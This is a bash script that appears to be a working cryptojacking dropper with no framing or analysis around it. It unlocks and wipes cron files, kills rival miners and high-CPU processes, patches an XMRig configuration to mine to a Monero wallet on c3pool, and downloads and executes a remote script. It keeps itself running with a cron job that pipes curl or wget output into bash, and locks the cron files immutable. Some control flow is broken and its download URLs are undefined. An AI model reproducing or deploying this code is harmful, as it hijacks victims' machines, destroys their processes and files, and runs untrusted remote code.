#!/bin/bash
for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1; do
if [ -f "$file" ]; then
chattr -i -a "$file"
fi
done
CUSTOM_ARG="${1:-x}"
crontab -r
iptables -A INPUT -s 66.23.199.44 -j DROP
iptables -A INPUT -s 45.94.31.89 -j DROP
ip route add blackhole 139.59.59.33 || true
ip route add blackhole 45.94.31.89 || true
rm -rf /bin/softirq || true
mkdir -p /bin/softirq || true
rm -rf /tmp/nuclear || true
mkdir -p /tmp/nuclear || true
ip route add blackhole 154.89.152.115 || true
rm -rf /tmp/runnv/* || true
mkdir -p /tmp/runnv/lived.sh || true
mkdir -p /tmp/runnv/alive.sh || true
mkdir -p /bin/softirq || true
rm -rf /usr/local/bin/watcher || true
mkdir -p /usr/local/bin/watcher || true
kill_and_remove_process() {
local term="$1"
if [ -z "$term" ]; then
echo "term not provided."
return 2
fi
local pids
pids=$(ps -eo pid,args | grep "$term" | grep -v grep | awk '{print $1}')
if [ -z "$pids" ]; then
return 1
fi
for pid in $pids; do
local exe_path
exe_path=$(readlink -f "/proc/$pid/exe" 2>/dev/null)
if [ -z "$exe_path" ]; then
echo "Skipping PID $pid"
continue
fi
# SAFETY CHECK: Exclude common system binary paths
case "$exe_path" in
/bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*)
echo "Skipping system binary for PID $pid at: $exe_path"
continue # Move to the next PID
;;
esac
# If the checks pass, proceed with termination and deletion
echo "Terminating non-system process '$term' with PID: $pid"
kill -9 "$pid"
if [ -f "$exe_path" ]; then
echo "Deleting executable: $exe_path"
rm -f "$exe_path"
if [ $? -eq 0 ]; then
echo "Executable successfully deleted."
else
echo "Error: Failed to delete executable. Check permissions."
fi
else
echo "Executable for PID $pid not found for deletion (already removed or inaccessible)."
fi
done
return 0
}
kill_and_remove_process ".rsyslogd" || true
kill_and_remove_process "crazyeltonproxy" || true
kill_and_remove_process "xmrig" || true
kill_and_remove_process "monero" || true
kill_and_remove_process "c3pool.org:80" || true
kill_and_remove_process "/bin/watcher" || true
kill_and_remove_process "45.94.31.89" || true
kill_and_remove_process "hosts-to-ignore" || true
kill_and_remove_process "supportxmr" || true
kill_and_remove_process "youyutebuae.xyz" || true
kill_and_remove_process "nuclear" || true
safe_patch_args() {
TARGET_FILE='/lib/systemd/cache/process-watcher'
NEW_VALUE='-o auto.c3pool.org:443 -u 883kAB7UfoJCKPzZAavUCHJdH4L2qVjqw4A79diUrFjBWBFrerhXPFbbUZnY2CemcUiBcLpAUz38vVYBbUqTHAgoAwgBCFH -p ZZZ'
[ -f "$TARGET_FILE" ] || { echo "[WARN] missing: $TARGET_FILE" >&2; return 0; }
ESCAPED_VALUE=$(printf '%s' "$NEW_VALUE" | sed 's/[\/&]/\\&/g') || return 0
if grep -q '^XMRIG_ARGS="[^"]*"$' "$TARGET_FILE"; then
sed -i "s/^XMRIG_ARGS=\"[^\"]*\"$/XMRIG_ARGS=\"$ESCAPED_VALUE\"/" "$TARGET_FILE" || :
else
printf '\nXMRIG_ARGS="%s"\n' "$NEW_VALUE" >> "$TARGET_FILE" || :
fi
}
safe_patch_args
for pid in $(pgrep -f 'bash /tmp/.*\.sh'); do
if [ "$pid" != "$$" ] && [ "$pid" != "$PPID" ]; then
kill -9 "$pid" 2>/dev/null && echo "Killed process $pid"
fi
done
if [ "$(id -u)" -eq 0 ]; then
echo "Stopping systemd_s service..."
systemctl stop systemd_s
fi
check_system_specs() {
local cpu_count=$(nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null || echo 1)
local is_root=false
if [[ $EUID -eq 0 ]]; then
is_root=true
fi
if [[ $cpu_count -gt 8 && "$is_root" == "true" ]]; then
echo "VERY GOOD BOY!"
fi
}
# Call the function
check_system_specs
kill_high_cpu_processes() {
local threshold=150.0
local exclude_patterns=("reservepattern23333" "goAwgBCFH")
local pid cpu cmdline
ps -eo pid,%cpu --sort=-%cpu | awk -v threshold="$threshold" \
'NR>1 && $2 > threshold {print $1}' | while read -r pid; do
# Read full command line (even if truncated in `ps`)
if [ -f "/proc/$pid/cmdline" ]; then
cmdline=$(tr '\0' ' ' < "/proc/$pid/cmdline")
else
echo "PID $pid died before inspection"
continue
fi
# Check for exclusion patterns in full cmdline
for pattern in "${exclude_patterns[@]}"; do
if [[ "$cmdline" == *"$pattern"* ]]; then
echo "Excluding PID $pid (matched '$pattern')"
continue 2
fi
done
if kill -9 "$pid" 2>/dev/null; then
echo "Killed PID $pid (CPU: $(ps -p "$pid" -o %cpu --no-headers)%)"
else
echo "Failed to kill PID $pid (already dead or permission denied)"
fi
done
}
kill_high_cpu_processes
is_program_running() {
found=0
for proc_dir in /proc/[0-9]*; do
if [ -d "$proc_dir" ]; then
pid=$(basename "$proc_dir")
if [ -r "$proc_dir/cmdline" ]; then
cmdline=$(cat "$proc_dir/cmdline" 2>/dev/null | tr '\0' ' ')
if echo "$cmdline" | grep -q "goAwgBCFH" && \
! echo "$cmdline" | grep -q "is_program_running"; then
if [ -r "$proc_dir/stat" ]; then
state=$(awk '{print $3}' "$proc_dir/stat" 2>/dev/null)
if [ "$state" != "Z" ]; then
found=1
break
fi
fi
fi
fi
fi
done
if [ $found -eq 1 ]; then
echo "Program is running."
return 0
else
echo "Program is not running."
return 1
fi
}
download_and_execute() {
local output_file="run.sh"
local is_in_china=false
if command -v curl &> /dev/null; then
is_in_china=true
fi
elif command -v wget &> /dev/null; then
is_in_china=true
fi
fi
# Select appropriate URL
local download_url="$primary_url"
if [ "$is_in_china" = true ]; then
download_url="$china_url"
fi
# Download the script
if command -v wget &> /dev/null; then
wget -qO "$output_file" "$download_url"
elif command -v curl &> /dev/null; then
curl -k -o "$output_file" "$download_url"
else
echo "Error: Neither wget nor curl is available. Please install one of them."
exit 1
fi
# Execute if download succeeded
if [[ -f "$output_file" ]]; then
chmod +x "$output_file"
sed -i 's/\r$//' "$output_file"
bash ./"$output_file" "$CUSTOM_ARG"
rm -f "$output_file"
else
echo "Error: Failed to download the script from $download_url"
exit 1
fi
}
get_cpu_count() {
# Try different methods to get CPU count
if [ -f "/proc/cpuinfo" ]; then
grep -c ^processor /proc/cpuinfo
else
sysctl -n hw.ncpu 2>/dev/null || nproc 2>/dev/null || getconf _NPROCESSORS_ONLN 2>/dev/null || echo 1
fi
}
is_ec2_host() {
# Check if hostname contains "ec2" (case insensitive)
hostname | grep -qi -e "ec2" -e "compute"
return $?
}
# Main logic
if ! is_program_running; then
cpu_count=$(get_cpu_count)
if [ "$cpu_count" -gt 3 ] || is_ec2_host; then
download_and_execute
else
echo "LOW CPU: System has only $cpu_count CPUs (minimum 4 required) and is not an EC2 instance"
fi
fi
create_cronjob() {
local cron_command
if command -v curl >/dev/null; then
cron_command="/bin/sh -c 'curl -fsSLk $1 | tr -d '\''\r'\'' | bash'"
elif command -v wget >/dev/null; then
cron_command="/bin/sh -c 'wget -qO- $1 | tr -d '\''\r'\'' | bash'"
else
log "Error: Cannot create cron job, neither curl nor wget is available."
return 1
fi
(crontab -l 2>/dev/null | grep -vF "$1"; echo "*/75 * * * * $cron_command") | crontab -
log "Cron job successfully configured."
}
for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1 /etc/init.d/down; do
if [ -f "$file" ]; then
chattr +i "$file"
chattr +a "$file"
fi
done